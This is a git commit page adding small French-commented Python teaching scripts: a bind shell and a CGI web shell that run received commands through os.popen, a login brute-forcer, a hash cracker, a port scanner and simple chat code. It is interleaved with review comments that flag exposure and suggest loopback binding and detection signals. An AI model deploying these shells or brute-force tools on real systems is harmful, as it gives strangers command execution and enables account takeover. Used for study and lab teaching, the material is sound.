| author | jerome <jerome@xlinfo.fr> | 2023-12-18 00:02:09 +0100 |
|---|---|---|
| committer | jerome <jerome@xlinfo.fr> | 2023-12-18 00:02:09 +0100 |
| commit | a1203ccb343703ba5ae522254f75b6384a1831a7 (patch) | |
| tree | c54e1e6cf0da29170419b2fd9880ff6dcea28742 | |
dépôt initial
| -rw-r--r-- | bindshell.py | 16 | ||||
| -rw-r--r-- | bruteforce.py | 27 | ||||
| -rw-r--r-- | chat_client.py | 15 | ||||
| -rw-r--r-- | chat_server.py | 18 | ||||
| -rw-r--r-- | connect.py | 14 | ||||
| -rw-r--r-- | crack_hash.py | 20 | ||||
| -rwxr-xr-x | html/cgi-bin/webshell.cgi | 35 | ||||
| -rw-r--r-- | html/index.html | 12 | ||||
| -rw-r--r-- | rot13.py | 4 | ||||
| -rw-r--r-- | scan.py | 17 |
10 files changed, 178 insertions, 0 deletions
diff --git a/bindshell.py b/bindshell.py
new file mode 100644
index 0000000..faa014d
--- /dev/null
+++ b/bindshell.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+import socket,os
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(('', 1234))
+ s.listen()
+ conn,addr = s.accept()
+ while 1:
+ data = conn.recv(1024)
+ reponse=os.popen(data.decode()).read()
+ conn.sendall(str(reponse).encode())
+except KeyboardInterrupt:
+ s.close()
+finally:
+ print("bye")
diff --git a/bruteforce.py b/bruteforce.py
new file mode 100644
index 0000000..45d950b
--- /dev/null
+++ b/bruteforce.py
@@ -0,0 +1,27 @@
+import sys
+import requests
+
+def bruteforce(url,username,password):
+ reponse=requests.post(url=url,data={
+ "username":username,
+ "password":password
+ })
+ #print(reponse.text)
+ if "Mauvais mot de passe" in reponse.text:
+ print("mauvais pwd")
+ return False
+ else:
+ print(f"Trouvé password \"{password}\"")
+ return True
+
+if __name__ == "__main__":
+ url = sys.argv[1]
+ dico = sys.argv[2]
+ with open(dico, 'r') as wordlist:
+ for password in wordlist.readlines():
+ password=password.strip()
+ if bruteforce(url,"jerome",password)==True:
+ sys.exit()
+
+#bruteforce("http://localhost/page.php","jerome","secret")
+
diff --git a/chat_client.py b/chat_client.py
new file mode 100644
index 0000000..0d1d9e8
--- /dev/null
+++ b/chat_client.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect(("localhost", 1234)) # adresse ip + port du serveur (tuple))
+ while 1:
+ message= input()
+ s.sendall(message.encode())
+ data=s.recv(1024)
+ print(data.decode())
+except KeyboardInterrupt:
+ s.close()
+finally:
+ print("bye")
diff --git a/chat_server.py b/chat_server.py
new file mode 100644
index 0000000..d857e99
--- /dev/null
+++ b/chat_server.py
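Review bot: In bindshell.py, `s.bind(('', 1234))` listens on every interface and each received buffer goes straight to `os.popen` with no authentication, so any host that can reach port 1234 gets command execution as the user running the script. For a teaching demo the listener should be restricted to loopback, `s.bind(('127.0.0.1', 1234))`, and the file should open with a comment stating that it is meant for an isolated lab machine only. On the detection side, a Python process that holds a listening TCP socket and spawns shell children is the pattern worth alerting on.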
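Review bot: In bruteforce.py, `if bruteforce(url,"jerome",password)==True:` compares a bool against `True`; `if bruteforce(url, "jerome", password):` is the idiomatic form. `requests.post` is called without `timeout=`, so a server that stops answering blocks the script indefinitely. The function has no docstring; a one-line summary saying it submits one username/password pair and returns True unless the failure text appears in the response would document the contract. The commented-out call at the bottom suggests the intended target is the author's own `http://localhost/page.php`, which is worth stating in a header comment.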
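Review bot: In chat_client.py the socket is closed only in the `except KeyboardInterrupt:` branch, so a dropped connection or EOF on `input()` leaves it open and ends in a traceback after "bye"; chat_server.py has the same structure and additionally never closes `conn`. Wrapping the body in `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` closes the socket on every exit path. `recv` returns `b''` once the peer has disconnected, so `if not data: break` after the `recv` call gives the loop a clean exit.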
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(('', 1234)) # toutes les interfaces réseau sur le port 1234
+ s.listen()
+ conn,addr = s.accept()
+ while 1:
+ data=conn.recv(1024)
+ print(data.decode())
+ reponse=input()
+ conn.sendall(reponse.encode())
+except KeyboardInterrupt:
+ s.close()
+finally:
+ print("bye")
+
diff --git a/connect.py b/connect.py
new file mode 100644
index 0000000..858d82f
--- /dev/null
+++ b/connect.py
@@ -0,0 +1,14 @@
+import sys
+host=sys.argv[1]
+port=int(sys.argv[2])
+
+import socket
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+addr_server=(host,port)
+tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès...
+if tentative==0:
+ print("port 80 ouvert")
+else:
+ print("Echec de connexion")
+s.close()
+
diff --git a/crack_hash.py b/crack_hash.py
new file mode 100644
index 0000000..a8ade90
--- /dev/null
+++ b/crack_hash.py
@@ -0,0 +1,20 @@
+import sys
+import hashlib
+
+def crack_hash(hash,wordlist,hashsum) :
+ """
+ Args:
+ hash : le hash à craquer
+ wordlist : la wordlist à utiliser
+ hashsum : md5 ou sha256 ou sha512...
+ """
+ with open(wordlist,"r") as fichier:
+ lignes = fichier.readlines()
+ for ligne in lignes:
+ #if hashlib.md5(ligne.strip().encode()).hexdigest() == hash:
+ if getattr(hashlib, hashsum)(ligne.strip().encode()).hexdigest() == hash :
+ print(f"trouvé : {ligne}")
+ exit()
+
+if __name__ == "__main__":
+ crack_hash(sys.argv[1],sys.argv[2],sys.argv[3])
diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi
new file mode 100755
index 0000000..6598d37
--- /dev/null
+++ b/html/cgi-bin/webshell.cgi
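Review bot: In connect.py the success message is hard-coded as `print("port 80 ouvert")` although the port comes from `sys.argv[2]`, so the output is wrong for any other port; it should be `print(f"port {port} ouvert")`. `import socket` sits below executable statements and belongs at the top next to `import sys`. `connect_ex` is called without a prior `s.settimeout(...)`, so a filtered port waits for the operating system's connect timeout.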
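Review bot: In crack_hash.py, `getattr(hashlib, hashsum)` calls whatever attribute of `hashlib` the third command-line argument names, so a typo or a non-constructor name fails with an `AttributeError` or `TypeError` instead of a clear message; `hashlib.new(hashsum, ligne.strip().encode())` rejects unknown algorithm names with `ValueError`. The parameter `hash` shadows the builtin, and `exit()` inside the function ends the interpreter for any caller, so returning the match and exiting under `__main__` would be cleaner. `print(f"trouvé : {ligne}")` prints the unstripped line, trailing newline included.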
@@ -0,0 +1,35 @@
+#!/usr/bin/env python3
+
+# après avoir lancé le serveur : python3 -m http.server --cgi
+# placer le script (rendu exécutable) dans /cgi-bin...
+
+import cgi
+import os
+
+form = cgi.FieldStorage()
+cmd = form.getvalue('command')
+user = os.getlogin()
+host = os.environ.get('SERVER_NAME')
+pwd = os.environ.get('PWD')
+
+print("Content-Type: text/html; charset=UTF-8\n\n")
+print ("""
+<html>
+<head>
+<title>Web shell</title>
+</head>
+<body>
+<h1>Web shell</h1>
+<p>Entrez votre commande : </p>
+<form action=''>
+<input type='text' name='command' id='command' />
+<input type='submit' value='submit' />
+</form>""")
+if cmd :
+ print("<pre style='display:inline-block;min-width:50em;padding:1em;background-color:black;color:white'>")
+ print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}")
+ print("</pre>")
+print("""
+<script>document.getElementById("command").focus()</script>
+</body>
+</html>""")
diff --git a/html/index.html b/html/index.html
new file mode 100644
index 0000000..ac28908
--- /dev/null
+++ b/html/index.html
@@ -0,0 +1,12 @@
+<!DOCTYPE>
+<html lang="en">
+<head>
+<title>redirection</title>
+<meta http-equiv="refresh" content="0;url=/cgi-bin/webshell.cgi" />
+</head>
+
+<body>
+
+</body>
+
+</html>
diff --git a/rot13.py b/rot13.py
new file mode 100644
index 0000000..f2d97b5
--- /dev/null
+++ b/rot13.py
@@ -0,0 +1,4 @@
+#!/usr/bin/env python3
+import codecs
+message = input()
+print(codecs.encode(message,'rot_13'))
@@ -0,0 +1,17 @@
+import socket
+
+host="127.0.0.1"
+for port in range(0,65535):
+ try:
+ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.settimeout(0.5)
+ s.connect((host,port)) # un tuple en argument : (( ))
+ try:
+ banner = s.recv(1024)
+ print("Le port ",port," est ouvert", banner.decode("utf-8").strip())
+ except:
+ print("Le port ",port," est ouvert")
+ except:
+ pass
+
+s.close() |
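Review bot: In webshell.cgi, `os.popen(cmd)` runs the `command` request parameter with no authentication, and the server named in the header comment, `python3 -m http.server --cgi`, binds to all interfaces by default, so the page gives command execution to anyone who can reach it; the comment should at least read `python3 -m http.server --cgi --bind 127.0.0.1` and mark the script as lab-only. `cmd` and the command output are written into the page unescaped, so markup in either is interpreted by the browser; both should go through `html.escape` before printing. `os.getlogin()` raises `OSError` when the process has no controlling terminal, and the `cgi` module is deprecated since Python 3.11 and removed in 3.13. For detection, requests to a `/cgi-bin/` path carrying a `command=` parameter and shell children of the web server process are the signals to log.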
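Review bot: In html/index.html, `<!DOCTYPE>` names no document type, which puts browsers into quirks mode; it should read `<!DOCTYPE html>`. The page's only function is the `meta` refresh to `/cgi-bin/webshell.cgi`, so it shares that script's exposure whenever the `html/` directory is served.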
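Review bot: In the last hunk both handlers are bare `except:`, which also catches `KeyboardInterrupt`, so Ctrl-C during a connection attempt is swallowed and the loop keeps running; narrow the outer handler to `except OSError:` and the inner one to `except (OSError, UnicodeDecodeError):`. Each iteration creates a socket that is never explicitly closed, and only the last one reaches the `s.close()` after the loop, so cleanup depends on garbage collection; `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` inside the loop fixes that. `range(0,65535)` includes port 0 and stops at 65534, while `range(1, 65536)` covers the valid range. The file header for this hunk is missing from the page; the diffstat suggests it belongs to scan.py.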
